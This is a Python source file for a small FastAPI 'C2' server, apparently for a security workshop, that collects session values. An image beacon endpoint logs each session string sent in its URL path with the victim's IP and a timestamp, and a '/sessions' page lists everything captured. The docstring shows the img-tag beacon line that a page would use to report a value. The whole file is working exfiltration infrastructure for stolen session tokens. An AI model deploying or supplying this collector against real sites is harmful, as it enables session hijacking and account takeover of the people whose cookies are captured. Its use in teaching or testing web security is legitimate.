111 lines
4 KiB
Python
111 lines
4 KiB
Python
from fastapi import FastAPI, Request, Response
|
|
from fastapi.responses import HTMLResponse
|
|
import threading
|
|
from datetime import datetime
|
|
import base64
|
|
import uvicorn
|
|
from typing import List, Dict
|
|
|
|
app = FastAPI(title="Tiny C2 (Workshop)")
|
|
|
|
# In-memory store of observed session values.
|
|
# Each entry is a dict: { "value": str, "ip": str, "ts": isoformat }
|
|
_sessions: List[Dict[str, str]] = []
|
|
_lock = threading.Lock()
|
|
|
|
# A 1x1 transparent PNG (base64) used as a static beacon image.
|
|
_1x1_png_b64 = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mP8z/C/HgAGgwJ/lK3Q6wAAAABJRU5ErkJggg=="
|
|
_IMAGE_BYTES = base64.b64decode(_1x1_png_b64)
|
|
|
|
|
|
def _record_session(value: str, ip: str) -> None:
|
|
"""Record a session value with client IP and timestamp (UTC ISO)."""
|
|
entry = {"value": value, "ip": ip, "ts": datetime.utcnow().isoformat() + "Z"}
|
|
with _lock:
|
|
_sessions.append(entry)
|
|
|
|
|
|
@app.get("/beacon/{session}", response_class=Response)
|
|
async def beacon(session: str, request: Request):
|
|
"""
|
|
Image beacon endpoint that accepts the session value as part of the URL path.
|
|
|
|
Example:
|
|
<img src="https://example.com/beacon/SESSION_VALUE" />
|
|
|
|
The server records the SESSION_VALUE (URL-decoded by FastAPI), the client's IP
|
|
and the UTC timestamp, then returns a 1x1 PNG image. Caching is disabled to
|
|
encourage repeated requests to be observed.
|
|
"""
|
|
client_ip = request.client.host if request.client else "unknown"
|
|
# session is provided by the URL path; FastAPI will have decoded percent-encoding
|
|
if session:
|
|
_record_session(session, client_ip)
|
|
|
|
headers = {
|
|
"Cache-Control": "no-cache, no-store, must-revalidate",
|
|
"Pragma": "no-cache",
|
|
"Expires": "0",
|
|
}
|
|
return Response(content=_IMAGE_BYTES, media_type="image/png", headers=headers)
|
|
|
|
|
|
@app.get("/sessions", response_class=HTMLResponse)
|
|
async def sessions_list():
|
|
"""
|
|
Displays all received session values in a simple HTML page.
|
|
|
|
The page lists the session string, observed client IP, and timestamp.
|
|
"""
|
|
with _lock:
|
|
snapshot = list(_sessions)
|
|
|
|
html_lines = [
|
|
"<!doctype html>",
|
|
"<html><head><meta charset='utf-8'><title>Observed Sessions</title></head><body>",
|
|
"<h1>Observed Sessions</h1>",
|
|
f"<p>Total: {len(snapshot)}</p>",
|
|
]
|
|
|
|
if not snapshot:
|
|
html_lines.append("<p><em>No sessions observed yet.</em></p>")
|
|
else:
|
|
html_lines.append(
|
|
"<table border='1' cellpadding='6' cellspacing='0'><thead><tr><th>#</th><th>Session</th><th>Client IP</th><th>Timestamp (UTC)</th></tr></thead><tbody>"
|
|
)
|
|
for i, e in enumerate(snapshot, 1):
|
|
# Basic HTML escaping and truncation to avoid huge rows and XSS.
|
|
raw_value = str(e.get("value", ""))
|
|
safe_value = (
|
|
raw_value[:200]
|
|
.replace("&", "&")
|
|
.replace("<", "<")
|
|
.replace(">", ">")
|
|
)
|
|
safe_ip = str(e.get("ip", "")).replace("&", "&")
|
|
ts = str(e.get("ts", ""))
|
|
html_lines.append(
|
|
f"<tr><td>{i}</td><td><code>{safe_value}</code></td><td>{safe_ip}</td><td>{ts}</td></tr>"
|
|
)
|
|
html_lines.append("</tbody></table>")
|
|
|
|
html_lines.append("</body></html>")
|
|
return HTMLResponse(content="\n".join(html_lines), status_code=200)
|
|
|
|
|
|
@app.get("/", response_class=HTMLResponse)
|
|
async def root():
|
|
html = (
|
|
"<!doctype html>"
|
|
"<html><head><meta charset='utf-8'><title>Small C2 Workshop Server</title></head><body>"
|
|
"<h1>Workshop C2 server</h1>"
|
|
"<p>Use <code>/beacon/<SESSION></code> as the image URL for a page that wants to report a session value.</p>"
|
|
'<p>View recorded values at <a href="/sessions">/sessions</a>.</p>'
|
|
"</body></html>"
|
|
)
|
|
return HTMLResponse(content=html)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
# Run with: python main.py
|
|
uvicorn.run("main:app", host="0.0.0.0", port=8000, log_level="info")
|